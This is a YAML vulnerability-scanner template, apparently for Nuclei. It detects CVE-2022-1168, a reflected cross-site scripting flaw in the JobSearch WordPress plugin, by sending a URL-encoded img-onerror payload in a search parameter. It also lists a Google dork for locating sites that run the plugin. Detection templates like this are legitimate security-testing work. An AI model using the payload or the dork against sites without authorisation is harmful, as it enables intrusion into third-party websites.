45 lines
1.3 KiB
YAML
45 lines
1.3 KiB
YAML
id: CVE-2022-1168
|
|
|
|
info:
|
|
name: JobSearch < 1.5.1 - Cross-Site Scripting
|
|
author: Akincibor
|
|
severity: medium
|
|
description: |
|
|
There is a Cross-Site Scripting vulnerability in the JobSearch WP JobSearch WordPress plugin before 1.5.1.
|
|
reference:
|
|
- https://wpscan.com/vulnerability/bcf38e87-011e-4540-8bfb-c93443a4a490
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-1168
|
|
- https://codecanyon.net/item/jobsearch-wp-job-board-wordpress-plugin/21066856
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2022-1168
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
google-dork: inurl:"wp-content/plugins/wp-jobsearch"
|
|
verified: "true"
|
|
tags: wp-jobsearch",wpscan,cve,cve2022,wp-plugin,wp,wordpress,xss
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<img src=x onerror=alert(domain)>"
|
|
- "wp-jobsearch"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 404
|